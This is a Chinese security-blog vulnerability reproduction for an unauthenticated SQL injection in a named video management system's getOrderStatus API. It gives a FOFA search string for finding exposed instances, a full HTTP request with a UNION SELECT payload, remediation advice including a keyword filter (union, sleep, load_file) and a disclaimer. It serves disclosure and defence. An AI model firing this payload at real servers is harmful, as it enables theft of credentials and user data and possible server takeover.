魅思-视频管理系统 getOrderStatus SQL注入漏洞PoC

admin 2024年10月7日17:30:38评论36 views字数 1071阅读3分34秒阅读模式
魅思-视频管理系统 getOrderStatus SQL注入漏洞PoC

 

0x02

产品介绍

魅思-视频管理系统是一款集成了视频管理、用户管理、手机端应用封装等功能的综合性视频管理系统。该系统不仅以其强大的视频管理功能、灵活的用户管理机制、便捷的手机端应用封装功能以及高安全性和现代化的界面设计,成为了市场上备受关注的视频管理系统之一。无论是对于专业的视频内容创作者还是对于需要视频管理功能的企业和个人用户来说,都是一个值得考虑的选择。
0x03

漏洞威胁

魅思-视频管理系统 getOrderStatus 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
0x04

漏洞环境

FOFA:

app="魅思-视频管理系统"

魅思-视频管理系统 getOrderStatus SQL注入漏洞PoC

0x05

漏洞复现

PoC

POST /api/getOrderStatus HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedConnection: closeorderSn=') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(IFNULL(CAST(VERSION() AS NCHAR),0x20)),NULL,NULL,NULL,NULL,NULL-- -

查询数据库版本

魅思-视频管理系统 getOrderStatus SQL注入漏洞PoC

0x06

批量脚本验证

Nuclei验证脚本已发布
知识星球:冷漠安全

魅思-视频管理系统 getOrderStatus SQL注入漏洞PoC

0x07

修复建议

使用预编译语句,所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。
对进入数据库的特殊字符('"@&*;等)进行转义处理,或编码转换。
确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。
过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。
0x08

 

原文始发于微信公众号(冷漠安全):「漏洞复现」魅思-视频管理系统 getOrderStatus SQL注入漏洞

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月7日17:30:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   魅思-视频管理系统 getOrderStatus SQL注入漏洞PoChttps://cn-sec.com/archives/3237573.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息